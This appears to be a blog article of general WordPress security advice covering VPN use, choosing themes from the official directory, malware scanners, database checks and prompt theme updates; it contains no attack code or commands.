If you are thinking your WordPress theme you are obtaining from a reputable developer is safe, think again. If you think that since the connection to your WordPress site is over https by default your site is also secure, think again.
WordPress being the most popular CMS for building personal and corporate sites means that any website template for WordPress is to face numerous automated and manual hacking attempts during its lifetime.
Cybersecurity experts warn that 29% of all hacked WordPress sites are penetrated via vulnerable themes. Add widespread sniffing for weak passwords used on insecure Wi-Fi networks to the whole picture and you get a messy scenario.
Secure Connection Is First Line of Defense
Many website administrators just need to manage their sites on the go. Using an insecure or compromised Wi-Fi connection at public places can reveal even the strongest passcode to potential attackers in plain text.
The first line of defense is to opt for one of the best free VPN services available and choose one that encrypts all of your incoming and outgoing traffic. You can use a VPN solution that protects all your devices, both desktop and mobile, to introduce an extra layer of security to your WordPress login.
This is only one of the mandatory security precautions, however. You need to establish practices that spot potential malicious code early enough to prevent harm to your site and visitors.
Check Origins of Any WordPress Theme
There are thousands of WordPress templates available and there are also hundreds of them that are vulnerable since the very moment they have been created.
A good method to avoid getting a hackable theme is to install only templates provided by the official WordPress site. Not that these themes are not being compromised on certain occasions but at least they are checked by the WordPress quality assurance team for known vulnerabilities. Then, it is up to you to update your theme and apply any patches upon release.
Use Malware Scanner to Check Themes
Plenty of online tools are available that scan your WordPress theme for potential vulnerabilities and unwanted code. Free online tools such as VirusTotal can scan a template for malicious code by simply uploading the theme to their website.
There are also plugins for WordPress that check already installed themes for a harmful code. Furthermore, some of these security tools can tell you where exactly the problem is in the theme’s source code and suggest a patch for the spotted vulnerability.
You should be aware that most of the weaknesses in a given WordPress theme are not intentional. Those are usually bugs and omissions for which a patch is available but you still need to know that the problem exists in the first place.
Your WordPress Database Also Needs Attention
The abovementioned tools check your theme and respectively your website for security holes. Your WordPress database is equally important though, as many attackers use SQL injections to install malicious code on a compromised website.
A good practice is to scan for common mistakes novice website owners make during the installation and setup of WordPress and their theme of choice. Tools such as WPScans offer free and paid plans to automatically scan your theme and entire website for vulnerabilities, including the WordPress database.
Always bear in mind that no security or antivirus tool detects all the threads. Use a combination of two or more malicious code scanners and follow all the best security practices to avoid theme infections.
Apply All WordPress Theme Updates Immediately
Cybersecurity experts have coined a term known as Window of Vulnerability that represents the time between a vulnerability is discovered and the time a patch is made available. Those discovered vulnerabilities for which no fix is yet available are known as Zero Day threats. Actually, any WordPress theme might contain Zero Day vulnerabilities and reputable WordPress developers thrive to release a fix as fast as possible.
That said, you need to apply any theme updates and patches immediately after they are released as you have already witnessed a certain period during which your WordPress site was running unprotected. Checking daily for available updates and patches for both your theme and core WordPress installation is actually mandatory from a security point of view.
Also, check the theme developer’s history to find out whether they are updating and patching their templates on a regular basis. It will save you a lot of effort and money as you definitely must replace any theme that lacks support in the long term.
Estimates are that over 99% of all hacked WordPress sites are compromised by the means of automated malware scripts. Taking into account that nearly one-third of the WordPress vulnerabilities are related to poorly developed themes, you may decide to complement the above methods and use a tool that hides your core WordPress files and theme paths. This way a malicious script will not know you are using a WordPress theme in the first place.
This is a solution for advanced WordPress administrators though, and the best practices we listed above should provide an acceptable level of security for most of the WordPress themes. Also, bear in mind that you need not scan themes developed and offered by WordPress and hosted under a free WordPress account as they are actually secure.